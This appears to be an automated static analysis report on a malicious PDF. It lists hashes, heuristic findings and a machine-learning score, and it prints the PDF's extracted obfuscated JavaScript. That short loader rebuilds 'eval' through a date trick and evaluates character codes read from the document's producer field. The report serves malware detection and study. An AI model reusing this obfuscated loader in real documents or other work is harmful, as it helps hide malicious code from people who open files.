Malicious PDF — malware analysis report

Static analysis result for SHA-256 2c2fd334401ac6c5…

MALICIOUS

PDF

22.1 KB Created: 2010-07-25 10:32:51 First seen: 2026-05-08
MD5: 74e4fe86a6dee09f48a7f437fe25dd84 SHA-1: dca10360cd0788e01423db649783a451082a3ea0 SHA-256: 2c2fd334401ac6c533d7cdfe9b1813c6e85dbb8b91e603e1576eabbc3610ca5d
116 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 Scripting: JavaScript

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream itself exhibits obfuscation, as noted by the EXTRACTED_FILE_STATIC_TRIAGE heuristic and the use of String.fromCharCode. While the exact payload is not discernible due to obfuscation, the presence of JavaScript within a PDF commonly signifies an attempt to execute malicious code, potentially exploiting a PDF reader vulnerability or downloading a secondary payload. No specific family could be identified.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    seqdf\(seqdf\('String.fromCharCode\(' + ylkiu + '\)'\)\);
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0x564D 375 bytes
SHA-256: b604139d29d80aada6df0df4874bb0ac41e04d41406f3d5b0410f5be79242d46
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
eimn = app;
qqdo = new Date(2010,11,4);
var uuqy='';
var fzcy = 'e'+qqdo.getDay()+'a'+uuqy+'l';
fzcy = fzcy.replace('6','v');
seqdf=eimn[fzcy];
var uuqy='';
seqdf('va'+uuqy+'r wre=th'+uuqy+'i'+uuqy+'s');
jir='pr' + uuqy + qqdo.getDay() + uuqy + 'uc' +'er';
jir = jir.replace('6', 'od');
var ylkiu = wre[jir];
seqdf(seqdf('String.fromCharCode(' + ylkiu + ')'));

Open this report in the interactive analyzer, or submit your own file for analysis.